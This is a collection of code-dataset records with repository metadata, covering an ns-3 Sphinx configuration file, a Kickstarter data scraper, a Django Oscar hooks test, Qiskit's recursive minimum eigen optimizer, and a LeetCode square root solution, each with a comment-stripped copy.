ns-3-dev/doc/models/source/conf.py
|
maxvonhippel/snake
|
0805773dc34e1480dffaae40174aa1f82d1c6ce8
|
[
"BSD-3-Clause"
] | null | null | null |
ns-3-dev/doc/models/source/conf.py
|
maxvonhippel/snake
|
0805773dc34e1480dffaae40174aa1f82d1c6ce8
|
[
"BSD-3-Clause"
] | 6
|
2016-03-01T06:32:21.000Z
|
2022-03-24T19:31:41.000Z
|
# -*- coding: utf-8 -*-
#
# ns-3 documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 14 09:00:39 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ns-3'
copyright = u'2011, ns-3 project'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'ns-3-dev'
# The full version, including alpha/beta/rc tags.
release = 'ns-3-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ns-3doc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ns-3-model-library.tex', u'ns-3 Model Library',
u'ns-3 project', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ns-3-model-library', u'ns-3 Model Library',
[u'ns-3 project'], 1)
]
| 32.267281
| 80
| 0.716938
|
import sys, os
extensions = ['sphinx.ext.pngmath']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'ns-3'
copyright = u'2011, ns-3 project'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'ns-3-dev'
# The full version, including alpha/beta/rc tags.
release = 'ns-3-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ns-3doc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ns-3-model-library.tex', u'ns-3 Model Library',
u'ns-3 project', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ns-3-model-library', u'ns-3 Model Library',
[u'ns-3 project'], 1)
]
| true
| true
|
790c69b6b006c6113255c1134a1cd5745849694b
| 1,706
|
py
|
Python
|
scripts/processing_scripts/raw_scrape_processing.py
|
sai-krishna-msk/KickAssist
|
7fb256e3ef4beff231332f6491ebb975f3fe4b43
|
[
"MIT"
] | null | null | null |
scripts/processing_scripts/raw_scrape_processing.py
|
sai-krishna-msk/KickAssist
|
7fb256e3ef4beff231332f6491ebb975f3fe4b43
|
[
"MIT"
] | 7
|
2021-06-08T21:18:49.000Z
|
2022-03-12T00:24:33.000Z
|
scripts/processing_scripts/raw_scrape_processing.py
|
sai-krishna-msk/KickAssist
|
7fb256e3ef4beff231332f6491ebb975f3fe4b43
|
[
"MIT"
] | null | null | null |
import os
import sys
path = os.getcwd()
package_path = (os.path.abspath(os.path.join(path, os.pardir))).replace('\\', '/')+'/'
sys.path.insert(1, package_path)
from config.config import *
##############################################Scrape-1###################################################
def contains(text , subtext):
if subtext in text:
return True
return False
def get_scrape_url(url):
encoding = "html.parser"
resp = requests.get(url)
http_encoding = resp.encoding if 'charset' in resp.headers.get('content-type', '').lower() else None
html_encoding = EncodingDetector.find_declared_encoding(resp.content, is_html=True)
encoding = html_encoding or http_encoding
soup = BeautifulSoup(resp.content, from_encoding=encoding)
for link in soup.find_all('a', href=True):
scrape_url = str(link['href'])
if(contains(scrape_url , "s3.amazonaws.com") and contains(scrape_url , ".zip")):
break
file_name = scrape_url.split("/Kickstarter/")[1]
return scrape_url, file_name
def download(scrape_url , output_directory):
try:
wget.download(scrape_url, out=output_directory)
except:
raise Exception("Failed in downloading the data file")
return output_directory
def unzip_data(input_file_path , output_directory):
try:
with zipfile.ZipFile(input_file_path, 'r') as zip_ref:
zip_ref.extractall(output_directory)
except Exception as e:
raise Exception("Failed to unzip the data folder !+....{}",format(e))
os.remove(input_file_path)
return True
###################################scrape-1ends############################################################
| 34.12
| 107
| 0.611958
|
import os
import sys
path = os.getcwd()
package_path = (os.path.abspath(os.path.join(path, os.pardir))).replace('\\', '/')+'/'
sys.path.insert(1, package_path)
from config.config import *
| true
| true
|
790c6a37e8a5d4de2bc90959adfbdcde3b8e33e3
| 1,317
|
py
|
Python
|
tests/functional/dashboard/test_hook.py
|
cage1016/django-oscar-hooks
|
3dc6fedb1cccc7ad0a120c609599ee418b17f9d9
|
[
"BSD-3-Clause"
] | 3
|
2016-06-01T22:58:39.000Z
|
2021-02-08T04:14:14.000Z
|
tests/functional/dashboard/test_hook.py
|
cage1016/django-oscar-hooks
|
3dc6fedb1cccc7ad0a120c609599ee418b17f9d9
|
[
"BSD-3-Clause"
] | 2
|
2020-04-15T08:26:50.000Z
|
2020-05-31T19:28:06.000Z
|
tests/functional/dashboard/test_hook.py
|
cage1016/django-oscar-hooks
|
3dc6fedb1cccc7ad0a120c609599ee418b17f9d9
|
[
"BSD-3-Clause"
] | null | null | null |
from django.core.urlresolvers import reverse
from oscar.core.loading import get_model
from oscar.test.testcases import WebTestCase, add_permissions
from oscar.test.factories import (
CategoryFactory, PartnerFactory, ProductFactory, ProductAttributeFactory)
from hooks.test.factories import (
HookEventFactory, HookFactory
)
ProductClass = get_model('catalogue', 'ProductClass')
Hook = get_model('hooks', 'Hook')
class TestAStaffUser(WebTestCase):
is_staff = True
def setUp(self):
super(TestAStaffUser, self).setUp()
self.partner = PartnerFactory()
def test_can_create_hook_with_hook_event(self):
hookevent = HookEventFactory()
hook = HookFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('hook-create', kwargs={"hook_class_slug": product_class.slug}))
form = page.form
form["name"] = u'books'
form["description"] = u'this is description'
form["hookevent_set-0-id"] = hook
form["hookevent_set-0-signal_type"] = hookevent.signal_type
form["hookevent_set-0-URL"] = hookevent.URL
form["hookevent_set-0-extra_headers"] = hookevent.extra_headers
response = form.submit(name='action', value='save')
assert Hook.objects.count() == 2
| 32.121951
| 95
| 0.699317
|
from django.core.urlresolvers import reverse
from oscar.core.loading import get_model
from oscar.test.testcases import WebTestCase, add_permissions
from oscar.test.factories import (
CategoryFactory, PartnerFactory, ProductFactory, ProductAttributeFactory)
from hooks.test.factories import (
HookEventFactory, HookFactory
)
ProductClass = get_model('catalogue', 'ProductClass')
Hook = get_model('hooks', 'Hook')
class TestAStaffUser(WebTestCase):
is_staff = True
def setUp(self):
super(TestAStaffUser, self).setUp()
self.partner = PartnerFactory()
def test_can_create_hook_with_hook_event(self):
hookevent = HookEventFactory()
hook = HookFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('hook-create', kwargs={"hook_class_slug": product_class.slug}))
form = page.form
form["name"] = u'books'
form["description"] = u'this is description'
form["hookevent_set-0-id"] = hook
form["hookevent_set-0-signal_type"] = hookevent.signal_type
form["hookevent_set-0-URL"] = hookevent.URL
form["hookevent_set-0-extra_headers"] = hookevent.extra_headers
response = form.submit(name='action', value='save')
assert Hook.objects.count() == 2
| true
| true
|
790c6b9006ec8858bb51f19dce28a4f5869a97fe
| 13,424
|
py
|
Python
|
qiskit/optimization/algorithms/recursive_minimum_eigen_optimizer.py
|
Cristian-Malinescu/qiskit-aqua
|
b29596800447c3130a20ec72a18b7fd8ed9fdb2f
|
[
"Apache-2.0"
] | null | null | null |
qiskit/optimization/algorithms/recursive_minimum_eigen_optimizer.py
|
Cristian-Malinescu/qiskit-aqua
|
b29596800447c3130a20ec72a18b7fd8ed9fdb2f
|
[
"Apache-2.0"
] | null | null | null |
qiskit/optimization/algorithms/recursive_minimum_eigen_optimizer.py
|
Cristian-Malinescu/qiskit-aqua
|
b29596800447c3130a20ec72a18b7fd8ed9fdb2f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""A recursive minimal eigen optimizer in Qiskit's optimization module."""
from copy import deepcopy
from enum import Enum
from typing import Optional, Union, List, Tuple, Dict
import logging
import numpy as np
from qiskit.aqua.algorithms import NumPyMinimumEigensolver
from qiskit.aqua.utils.validation import validate_min
from .optimization_algorithm import OptimizationAlgorithm, OptimizationResult
from .minimum_eigen_optimizer import MinimumEigenOptimizer, MinimumEigenOptimizationResult
from ..converters.quadratic_program_to_qubo import QuadraticProgramToQubo
from ..exceptions import QiskitOptimizationError
from ..problems import Variable
from ..problems.quadratic_program import QuadraticProgram
logger = logging.getLogger(__name__)
class IntermediateResult(Enum):
"""
Defines whether the intermediate results of
:class:`~qiskit.optimization.algorithms.RecursiveMinimumEigenOptimizer`
at each iteration should be stored and returned to the end user.
"""
NO_ITERATIONS = 0
"""No intermediate results are stored."""
LAST_ITERATION = 1
"""Only results from the last iteration are stored."""
ALL_ITERATIONS = 2
"""All intermediate results are stored."""
class RecursiveMinimumEigenOptimizationResult(OptimizationResult):
"""Recursive Eigen Optimizer Result."""
def __init__(self, x: Union[List[float], np.ndarray], fval: float,
variables: List[Variable],
replacements: Dict[str, Tuple[str, int]],
history: Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]) -> None:
"""
Constructs an instance of the result class.
Args:
x: the optimal value found in the optimization.
fval: the optimal function value.
variables: the list of variables of the optimization problem.
replacements: a dictionary of substituted variables. Key is a variable being
substituted, value is a tuple of substituting variable and a weight, either 1 or -1.
history: a tuple containing intermediate results. The first element is a list of
:class:`~qiskit.optimization.algorithms.MinimumEigenOptimizerResult` obtained by
invoking :class:`~qiskit.optimization.algorithms.MinimumEigenOptimizer` iteratively,
the second element is an instance of
:class:`~qiskit.optimization.algorithm.OptimizationResult` obtained at the last step
via `min_num_vars_optimizer`.
"""
super().__init__(x, fval, variables, None)
self._replacements = replacements
self._history = history
@property
def replacements(self) -> Dict[str, Tuple[str, int]]:
"""
Returns a dictionary of substituted variables. Key is a variable being substituted, value
is a tuple of substituting variable and a weight, either 1 or -1."""
return self._replacements
@property
def history(self) -> Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]:
"""
Returns intermediate results. The first element is a list of
:class:`~qiskit.optimization.algorithms.MinimumEigenOptimizerResult` obtained by invoking
:class:`~qiskit.optimization.algorithms.MinimumEigenOptimizer` iteratively, the second
element is an instance of :class:`~qiskit.optimization.algorithm.OptimizationResult`
obtained at the last step via `min_num_vars_optimizer`.
"""
return self._history
class RecursiveMinimumEigenOptimizer(OptimizationAlgorithm):
"""A meta-algorithm that applies a recursive optimization.
The recursive minimum eigen optimizer applies a recursive optimization on top of
:class:`~qiskit.optimization.algorithms.MinimumEigenOptimizer`.
The algorithm is introduced in [1].
Examples:
Outline of how to use this class:
.. code-block::
from qiskit.aqua.algorithms import QAOA
from qiskit.optimization.problems import QuadraticProgram
from qiskit.optimization.algorithms import RecursiveMinimumEigenOptimizer
problem = QuadraticProgram()
# specify problem here
# specify minimum eigen solver to be used, e.g., QAOA
qaoa = QAOA(...)
optimizer = RecursiveMinimumEigenOptimizer(qaoa)
result = optimizer.solve(problem)
References:
[1]: Bravyi et al. (2019), Obstacles to State Preparation and Variational Optimization
from Symmetry Protection. http://arxiv.org/abs/1910.08980.
"""
def __init__(self, min_eigen_optimizer: MinimumEigenOptimizer, min_num_vars: int = 1,
min_num_vars_optimizer: Optional[OptimizationAlgorithm] = None,
penalty: Optional[float] = None,
history: Optional[IntermediateResult] = IntermediateResult.LAST_ITERATION) -> None:
""" Initializes the recursive minimum eigen optimizer.
This initializer takes a ``MinimumEigenOptimizer``, the parameters to specify until when to
to apply the iterative scheme, and the optimizer to be applied once the threshold number of
variables is reached.
Args:
min_eigen_optimizer: The eigen optimizer to use in every iteration.
min_num_vars: The minimum number of variables to apply the recursive scheme. If this
threshold is reached, the min_num_vars_optimizer is used.
min_num_vars_optimizer: This optimizer is used after the recursive scheme for the
problem with the remaining variables.
penalty: The factor that is used to scale the penalty terms corresponding to linear
equality constraints.
history: Whether the intermediate results are stored.
Default value is :py:obj:`~IntermediateResult.LAST_ITERATION`.
Raises:
QiskitOptimizationError: In case of invalid parameters (num_min_vars < 1).
"""
validate_min('min_num_vars', min_num_vars, 1)
self._min_eigen_optimizer = min_eigen_optimizer
self._min_num_vars = min_num_vars
if min_num_vars_optimizer:
self._min_num_vars_optimizer = min_num_vars_optimizer
else:
self._min_num_vars_optimizer = MinimumEigenOptimizer(NumPyMinimumEigensolver())
self._penalty = penalty
self._history = history
self._qubo_converter = QuadraticProgramToQubo()
def get_compatibility_msg(self, problem: QuadraticProgram) -> str:
"""Checks whether a given problem can be solved with this optimizer.
Checks whether the given problem is compatible, i.e., whether the problem can be converted
to a QUBO, and otherwise, returns a message explaining the incompatibility.
Args:
problem: The optimization problem to check compatibility.
Returns:
A message describing the incompatibility.
"""
return QuadraticProgramToQubo.get_compatibility_msg(problem)
def solve(self, problem: QuadraticProgram) -> OptimizationResult:
"""Tries to solve the given problem using the recursive optimizer.
Runs the optimizer to try to solve the optimization problem.
Args:
problem: The problem to be solved.
Returns:
The result of the optimizer applied to the problem.
Raises:
QiskitOptimizationError: Incompatible problem.
QiskitOptimizationError: Infeasible due to variable substitution
"""
self._verify_compatibility(problem)
# convert problem to QUBO, this implicitly checks if the problem is compatible
problem_ = self._qubo_converter.convert(problem)
problem_ref = deepcopy(problem_)
# run recursive optimization until the resulting problem is small enough
replacements = {} # type: Dict[str, Tuple[str, int]]
min_eigen_results = [] # type: List[MinimumEigenOptimizationResult]
while problem_.get_num_vars() > self._min_num_vars:
# solve current problem with optimizer
res = self._min_eigen_optimizer.solve(problem_) # type: MinimumEigenOptimizationResult
if self._history == IntermediateResult.ALL_ITERATIONS:
min_eigen_results.append(res)
# analyze results to get strongest correlation
correlations = res.get_correlations()
i, j = self._find_strongest_correlation(correlations)
x_i = problem_.variables[i].name
x_j = problem_.variables[j].name
if correlations[i, j] > 0:
# set x_i = x_j
problem_ = problem_.substitute_variables(variables={i: (j, 1)})
if problem_.status == QuadraticProgram.Status.INFEASIBLE:
raise QiskitOptimizationError('Infeasible due to variable substitution')
replacements[x_i] = (x_j, 1)
else:
# set x_i = 1 - x_j, this is done in two steps:
# 1. set x_i = 1 + x_i
# 2. set x_i = -x_j
# 1a. get additional offset
constant = problem_.objective.constant
constant += problem_.objective.linear[i]
constant += problem_.objective.quadratic[i, i]
problem_.objective.constant = constant
# 1b. get additional linear part
for k in range(problem_.get_num_vars()):
coeff = problem_.objective.linear[k]
if k == i:
coeff += 2*problem_.objective.quadratic[i, k]
else:
coeff += problem_.objective.quadratic[i, k]
# set new coefficient if not too small
if np.abs(coeff) > 1e-10:
problem_.objective.linear[k] = coeff
else:
problem_.objective.linear[k] = 0
# 2. replace x_i by -x_j
problem_ = problem_.substitute_variables(variables={i: (j, -1)})
if problem_.status == QuadraticProgram.Status.INFEASIBLE:
raise QiskitOptimizationError('Infeasible due to variable substitution')
replacements[x_i] = (x_j, -1)
# solve remaining problem
result = self._min_num_vars_optimizer.solve(problem_)
# unroll replacements
var_values = {}
for i, x in enumerate(problem_.variables):
var_values[x.name] = result.x[i]
def find_value(x, replacements, var_values):
if x in var_values:
# if value for variable is known, return it
return var_values[x]
elif x in replacements:
# get replacement for variable
(y, sgn) = replacements[x]
# find details for replacing variable
value = find_value(y, replacements, var_values)
# construct, set, and return new value
var_values[x] = value if sgn == 1 else 1 - value
return var_values[x]
else:
raise QiskitOptimizationError('Invalid values!')
# loop over all variables to set their values
for x_i in problem_ref.variables:
if x_i.name not in var_values:
find_value(x_i.name, replacements, var_values)
# build history before any translations are applied
# min_eigen_results is an empty list if history is set to NO or LAST.
history = (min_eigen_results,
None if self._history == IntermediateResult.NO_ITERATIONS else result)
# construct result
x_v = [var_values[x_aux.name] for x_aux in problem_ref.variables]
fval = result.fval
result = OptimizationResult(x=x_v, fval=fval, variables=problem_ref.variables)
result = self._qubo_converter.interpret(result)
return RecursiveMinimumEigenOptimizationResult(x=result.x, fval=result.fval,
variables=result.variables,
replacements=replacements,
history=history)
def _find_strongest_correlation(self, correlations):
# get absolute values and set diagonal to -1 to make sure maximum is always on off-diagonal
abs_correlations = np.abs(correlations)
for i in range(len(correlations)):
abs_correlations[i, i] = -1
# get index of maximum (by construction on off-diagonal)
m_max = np.argmax(abs_correlations.flatten())
# translate back to indices
i = int(m_max // len(correlations))
j = int(m_max - i*len(correlations))
return (i, j)
| 43.584416
| 100
| 0.65003
|
from copy import deepcopy
from enum import Enum
from typing import Optional, Union, List, Tuple, Dict
import logging
import numpy as np
from qiskit.aqua.algorithms import NumPyMinimumEigensolver
from qiskit.aqua.utils.validation import validate_min
from .optimization_algorithm import OptimizationAlgorithm, OptimizationResult
from .minimum_eigen_optimizer import MinimumEigenOptimizer, MinimumEigenOptimizationResult
from ..converters.quadratic_program_to_qubo import QuadraticProgramToQubo
from ..exceptions import QiskitOptimizationError
from ..problems import Variable
from ..problems.quadratic_program import QuadraticProgram
logger = logging.getLogger(__name__)
class IntermediateResult(Enum):
NO_ITERATIONS = 0
LAST_ITERATION = 1
ALL_ITERATIONS = 2
class RecursiveMinimumEigenOptimizationResult(OptimizationResult):
def __init__(self, x: Union[List[float], np.ndarray], fval: float,
variables: List[Variable],
replacements: Dict[str, Tuple[str, int]],
history: Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]) -> None:
super().__init__(x, fval, variables, None)
self._replacements = replacements
self._history = history
@property
def replacements(self) -> Dict[str, Tuple[str, int]]:
return self._replacements
@property
def history(self) -> Tuple[List[MinimumEigenOptimizationResult], OptimizationResult]:
return self._history
class RecursiveMinimumEigenOptimizer(OptimizationAlgorithm):
def __init__(self, min_eigen_optimizer: MinimumEigenOptimizer, min_num_vars: int = 1,
min_num_vars_optimizer: Optional[OptimizationAlgorithm] = None,
penalty: Optional[float] = None,
history: Optional[IntermediateResult] = IntermediateResult.LAST_ITERATION) -> None:
validate_min('min_num_vars', min_num_vars, 1)
self._min_eigen_optimizer = min_eigen_optimizer
self._min_num_vars = min_num_vars
if min_num_vars_optimizer:
self._min_num_vars_optimizer = min_num_vars_optimizer
else:
self._min_num_vars_optimizer = MinimumEigenOptimizer(NumPyMinimumEigensolver())
self._penalty = penalty
self._history = history
self._qubo_converter = QuadraticProgramToQubo()
def get_compatibility_msg(self, problem: QuadraticProgram) -> str:
return QuadraticProgramToQubo.get_compatibility_msg(problem)
def solve(self, problem: QuadraticProgram) -> OptimizationResult:
self._verify_compatibility(problem)
problem_ = self._qubo_converter.convert(problem)
problem_ref = deepcopy(problem_)
replacements = {}
min_eigen_results = []
while problem_.get_num_vars() > self._min_num_vars:
res = self._min_eigen_optimizer.solve(problem_)
if self._history == IntermediateResult.ALL_ITERATIONS:
min_eigen_results.append(res)
correlations = res.get_correlations()
i, j = self._find_strongest_correlation(correlations)
x_i = problem_.variables[i].name
x_j = problem_.variables[j].name
if correlations[i, j] > 0:
problem_ = problem_.substitute_variables(variables={i: (j, 1)})
if problem_.status == QuadraticProgram.Status.INFEASIBLE:
raise QiskitOptimizationError('Infeasible due to variable substitution')
replacements[x_i] = (x_j, 1)
else:
constant = problem_.objective.constant
constant += problem_.objective.linear[i]
constant += problem_.objective.quadratic[i, i]
problem_.objective.constant = constant
for k in range(problem_.get_num_vars()):
coeff = problem_.objective.linear[k]
if k == i:
coeff += 2*problem_.objective.quadratic[i, k]
else:
coeff += problem_.objective.quadratic[i, k]
if np.abs(coeff) > 1e-10:
problem_.objective.linear[k] = coeff
else:
problem_.objective.linear[k] = 0
problem_ = problem_.substitute_variables(variables={i: (j, -1)})
if problem_.status == QuadraticProgram.Status.INFEASIBLE:
raise QiskitOptimizationError('Infeasible due to variable substitution')
replacements[x_i] = (x_j, -1)
result = self._min_num_vars_optimizer.solve(problem_)
var_values = {}
for i, x in enumerate(problem_.variables):
var_values[x.name] = result.x[i]
def find_value(x, replacements, var_values):
if x in var_values:
return var_values[x]
elif x in replacements:
(y, sgn) = replacements[x]
value = find_value(y, replacements, var_values)
var_values[x] = value if sgn == 1 else 1 - value
return var_values[x]
else:
raise QiskitOptimizationError('Invalid values!')
for x_i in problem_ref.variables:
if x_i.name not in var_values:
find_value(x_i.name, replacements, var_values)
history = (min_eigen_results,
None if self._history == IntermediateResult.NO_ITERATIONS else result)
x_v = [var_values[x_aux.name] for x_aux in problem_ref.variables]
fval = result.fval
result = OptimizationResult(x=x_v, fval=fval, variables=problem_ref.variables)
result = self._qubo_converter.interpret(result)
return RecursiveMinimumEigenOptimizationResult(x=result.x, fval=result.fval,
variables=result.variables,
replacements=replacements,
history=history)
def _find_strongest_correlation(self, correlations):
abs_correlations = np.abs(correlations)
for i in range(len(correlations)):
abs_correlations[i, i] = -1
m_max = np.argmax(abs_correlations.flatten())
i = int(m_max // len(correlations))
j = int(m_max - i*len(correlations))
return (i, j)
| true
| true
|
790c6bbc06bf28c97b8abd222424095a64d7b052
| 335
|
py
|
Python
|
SEARCHING/EASY/Sqrt(x)/Code.py
|
HassanRahim26/LEETCODE
|
c0ec81b037ff7b2d6e6030ac9835c21ed825100f
|
[
"MIT"
] | 3
|
2021-08-31T11:02:28.000Z
|
2022-01-17T08:07:00.000Z
|
SEARCHING/EASY/Sqrt(x)/Code.py
|
HassanRahim26/LEETCODE
|
c0ec81b037ff7b2d6e6030ac9835c21ed825100f
|
[
"MIT"
] | null | null | null |
SEARCHING/EASY/Sqrt(x)/Code.py
|
HassanRahim26/LEETCODE
|
c0ec81b037ff7b2d6e6030ac9835c21ed825100f
|
[
"MIT"
] | null | null | null |
# PROBLEM LINK:- https://leetcode.com/problems/sqrtx/
class Solution:
def mySqrt(self, x):
a = 1e-6
low = 1
high = x
while high - low > a:
mid = (high + low)/2
if mid * mid < x:
low = mid
else:
high = mid
return int(high)
| 22.333333
| 53
| 0.426866
|
class Solution:
def mySqrt(self, x):
a = 1e-6
low = 1
high = x
while high - low > a:
mid = (high + low)/2
if mid * mid < x:
low = mid
else:
high = mid
return int(high)
| true
| true
|
790c6d754b2f6b4a829eb710e03b699641ff0b23
| 551
|
py
|
Python
|
src/version.py
|
StevenBaby/chess
|
1aa3065d974351df58a5620c78ca80a10a385321
|
[
"MIT"
] | 10
|
2021-06-17T21:45:59.000Z
|
2022-03-23T04:02:45.000Z
|
src/version.py
|
StevenBaby/chess
|
